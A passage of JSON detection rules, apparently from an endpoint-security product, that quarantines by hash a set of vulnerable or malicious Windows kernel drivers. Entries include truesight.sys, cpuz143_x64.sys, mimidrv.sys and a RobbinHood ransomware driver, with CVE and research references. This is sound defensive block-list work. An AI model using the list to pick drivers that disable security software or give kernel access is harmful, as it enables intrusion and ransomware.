+ "id": "4defc3fb-9847-55c8-9de3-5c17d89c8bbb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.611393Z",
+ "creation_date": "2026-03-23T11:45:29.611395Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.611401Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3b2a3b74127c7ecf095e0fe5a65af31b9701d2ba6dc2a4d87882de65d84842c0",
+ "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4df13330-7987-558d-94c3-e8f399123975",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.143218Z",
+ "creation_date": "2026-03-23T11:45:31.143220Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.143226Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "53617059a1ca7a85c563f86f8102fab3faa7dcb24aad2f2e7da80b8295a02c45",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4df67c07-62fb-5b61-b6af-cf43e08fc5f4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.468638Z",
+ "creation_date": "2026-03-23T11:45:30.468641Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.468650Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "30f9aca036adbcc15cace326e042ed3590f00045f66982afbf569d8fd9b6747b",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4e0049ee-4caf-52b9-ac43-53e05c2bd6f8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.145090Z",
+ "creation_date": "2026-03-23T11:45:31.145092Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.145097Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "964f39b115ba8b3a0b8fb73427485c9ec308d33d50c7f07738257a7401c533d0",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4e01b31f-8ef9-55ef-9458-971bfc126a35",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.616470Z",
+ "creation_date": "2026-03-23T11:45:29.616472Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.616477Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f06fdfe50ebc8d1d2daf5811b66288563f26a09a2ec9c2a21e2a71ff19756062",
+ "comment": "American Megatrends vulnerable BIOS flash tool (aka UCOREW64.SYS and amifldrv64.sys) [https://www.loldrivers.io/drivers/a338a9fc-9fe3-400c-9fe4-69bb7892602d/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4e06ed7c-c8c1-5f24-89d9-f1842a1144c5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.826543Z",
+ "creation_date": "2026-03-23T11:45:31.826545Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.826551Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "96e3b89240889b23351e68525bc12d9c5a9150bf8edece3debc58b4917a648d9",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4e0902b8-376c-5d1e-94d9-8b0f2cfd7b9b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.454448Z",
+ "creation_date": "2026-03-23T11:45:30.454452Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.454460Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7a1dfe962c0c714c35827f7cf19bbca693bb1e769037b06b5f86d7f33b723f72",
+ "comment": "Vulnerable Kernel Driver (aka kEvP64.sys) [https://www.loldrivers.io/drivers/fe2f68e1-e459-4802-9a9a-23bb3c2fd331/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4e0fd229-e5b0-5467-8ca7-c70fd462e0a8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.479530Z",
+ "creation_date": "2026-03-23T11:45:30.479532Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.479537Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b06dad9821beef3442cd9e775228baa56582a3a85c9d178693f3cf236623de17",
+ "comment": "Vulnerable Kernel Driver (aka segwindrvx64.sys) [https://www.loldrivers.io/drivers/a4aa80bc-4ecd-49ab-bc0f-0f49b07fdd7f/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4e2015db-1aec-53dd-bea5-1587cd5ad482",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.611113Z",
+ "creation_date": "2026-03-23T11:45:29.611115Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.611120Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ff0857f3e3f4e6248e169e9df3fdf4dc571bc65ec731cf11be2532d9405d95d2",
+ "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4e366dd1-0545-5d14-b9af-bd60eb5379b9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.151304Z",
+ "creation_date": "2026-03-23T11:45:31.151307Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.151346Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5464daff8ea291c07bbfeeedd186ef81b5518239e9201c75580d94804b3bfe89",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4e40be56-e33d-523b-ac2d-7ca46452cd7f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.968631Z",
+ "creation_date": "2026-03-23T11:45:29.968633Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.968638Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "608b352bef3e56480ede69c1641af11e5fac88e04e4cd776a9c5ae029a286b72",
+ "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4e521e0b-5950-5522-9046-c96f29c1ad0b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.826497Z",
+ "creation_date": "2026-03-23T11:45:30.826499Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.826504Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3dde98fdf64982a6272ac0e91cfa5d98b0aa7bb856338de84fa7c5e2c44471ba",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4e56aa98-3812-53ce-9d40-b10dd4657ed8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.617115Z",
+ "creation_date": "2026-03-23T11:45:29.617117Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.617122Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a4e850e7847499e7d4c2754f8a4973fc5b4adeb728e1e142d1d35d519edf3274",
+ "comment": "American Megatrends vulnerable BIOS flash tool (aka UCOREW64.SYS and amifldrv64.sys) [https://www.loldrivers.io/drivers/a338a9fc-9fe3-400c-9fe4-69bb7892602d/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4e5bed66-f133-5a85-988b-1f7be3a339e3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.494275Z",
+ "creation_date": "2026-03-23T11:45:31.494278Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.494287Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "baf9a9d5cf80c5ecc293acb7655b654e943bd00aefc2afe0b805183be6d8a211",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4e5c5f9c-b694-5dc6-8172-961780824a95",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.829540Z",
+ "creation_date": "2026-03-23T11:45:31.829542Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.829547Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "013d03802f367cd8c8d45590bb27d01672d91808b157611f687ac603be778dcc",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4e5f6ef4-aded-5b93-9f80-00f6384bc5e6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.827035Z",
+ "creation_date": "2026-03-23T11:45:30.827037Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.827042Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d31de75c30d650de31bfeb5748f7981960672aa2fc26c8b49ff02c75d1446cc2",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4e628a5e-5f60-5e77-b938-14bceb58853c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.977469Z",
+ "creation_date": "2026-03-23T11:45:29.977471Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.977480Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "000547560fea0dd4b477eb28bf781ea67bf83c748945ce8923f90fdd14eb7a4b",
+ "comment": "Vulnerable Kernel Driver (aka CorsairLLAccess64.sys) [https://www.loldrivers.io/drivers/a9d9cbb7-b5f6-4e74-97a5-29993263280e/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4e72d7e2-b53d-59b2-b3f0-fe421468eb51",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.621829Z",
+ "creation_date": "2026-03-23T11:45:29.621831Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.621836Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "739c11fdb8673ab5b78f1a874daf5ba3faddb7910a6d4e0cc49abd8b8537333f",
+ "comment": "ASUSTeK GPU vulnerable physmem driver (aka AsIO2_64.sys) [https://syscall.eu/blog/2020/03/30/asus_gio/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4e7abd0d-7e89-52a7-9e12-99a66349cb11",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.617833Z",
+ "creation_date": "2026-03-23T11:45:29.617835Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.617840Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a899b659b08fbae30b182443be8ffb6a6471c1d0497b52293061754886a937a3",
+ "comment": "NVIDIA vulnerable flash tool (aka nvflash.sys nd nvflsh64.sys) [CVE-2019-5688] [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4e7d5263-a185-5503-8be8-ff7bdf445e25",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.481922Z",
+ "creation_date": "2026-03-23T11:45:31.481926Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.481935Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b707f011d2e9a0d68513e7190ee788114fae3abacaf81ffbd6c187a71ab8d100",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4e80d689-e7f2-56ae-8e0c-0543046db358",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.500283Z",
+ "creation_date": "2026-03-23T11:45:31.500286Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.500294Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d86fead83d85832f0fa80d7b5c752dd3742b2ac3573cbaf89d3e2f2e58fdbe3e",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4e844007-3826-5800-9e31-3e204762f4de",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.609576Z",
+ "creation_date": "2026-03-23T11:45:29.609577Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.609583Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0b15b5cc64caf0c6ad9bd759eb35383b1f718edf3d7ab4cd912d0d8c1826edf8",
+ "comment": "RobbinHood ransomware malicious driver (aka rbnl.sys) [https://news.sophos.com/en-us/2020/02/06/living-off-another-land-ransomware-borrows-vulnerable-driver-to-remove-security-software/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4ea2d991-9422-57c8-9d34-fe22c8ce425f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
